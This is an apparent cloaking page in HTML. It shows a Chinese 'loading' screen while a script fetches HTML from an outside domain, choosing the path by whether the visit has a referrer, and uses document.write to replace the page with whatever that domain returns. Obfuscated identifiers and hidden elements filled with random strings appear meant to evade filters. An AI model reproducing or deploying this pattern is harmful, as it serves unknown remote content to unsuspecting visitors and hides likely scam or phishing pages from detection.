<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .M1CQ1mKA4Ek {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .M1CQ1mKA4Ek .cNQIDGR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .M1CQ1mKA4Ek .content {
            line-height: 50px;
            text-align: center
        }

        .M1CQ1mKA4Ek .img {
            width: 100%
        }

        .M1CQ1mKA4Ek .hyyQwK {
            text-align: center
        }

        .M1CQ1mKA4Ek .hyyQwK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .M1CQ1mKA4Ek .hyyQwK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .M1CQ1mKA4Ek .hyyQwK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .M1CQ1mKA4Ek .hyyQwK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .M1CQ1mKA4Ek .hyyQwK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .M1CQ1mKA4Ek .hyyQwK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .M1CQ1mKA4Ek .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PhqBr1iJCpl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vfUDJJr = PhqBr1iJCpl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vfUDJJr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vfUDJJr +".html?a=share";
		}
		
        ty72RcPCQ=url+"#"+new Date().getTime();
        ty72RcPCQ && function() {
            $.get(ty72RcPCQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>lmUL79tDWFPBJpAXY3omuOiREt1AoICNHthp7QUGUeah6MSojqGGvkVSYSo2GWMOpTSc8dndjpPTFNcMHakzBtRwB0GX</p>
<b style='display:none' >ph8vPsvP51GiNhLq8bFOzyOZPNcE2lMds9dceXeICOIRJBNLz9oevQWvlkpa2z3zHfZndshqiWhrHP3sjSZ0rY</b>
<img  src='' style='display:none'><div class="M1CQ1mKA4Ek">
    <div class="cNQIDGR">
        <div class="hyyQwK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>rKWBbfMzylfmEmI1wZU16C7o0SMITGJiJdGKar8tuZrPx7y0yJpeNfq4x6e0o9GmqE</a>
<a  href='#' style='display:none'>rKWBbfMzylfmEmI1wZU16C7o0SMITGJiJdGKar8tuZrPx7y0yJpeNfq4x6e0o9GmqE</a>
<span style='display:none'>pDbeJaS5sTJ1kx6DRLlXBvPZVRS2dUmrC91MuSmTLK4zyWA7yncrTthc0msfjymg</span>
<ul style='display:none' >Vnl34J9PNR445jFoxsl3DwLyBdJtz1xoF54z6mgHD7ZYggHZb64oh5OX4YoMZ6wptYwUkshGP0PHT4cqpkaDnGvDh69c4</ul>
<b style='display:none' >cAeVEfxQeYTNIyJZcmgLPkMe8RCZBaVd4TNfj3RJ6hMz2aAPePqihbZuEo6aDh</b></body>
</html>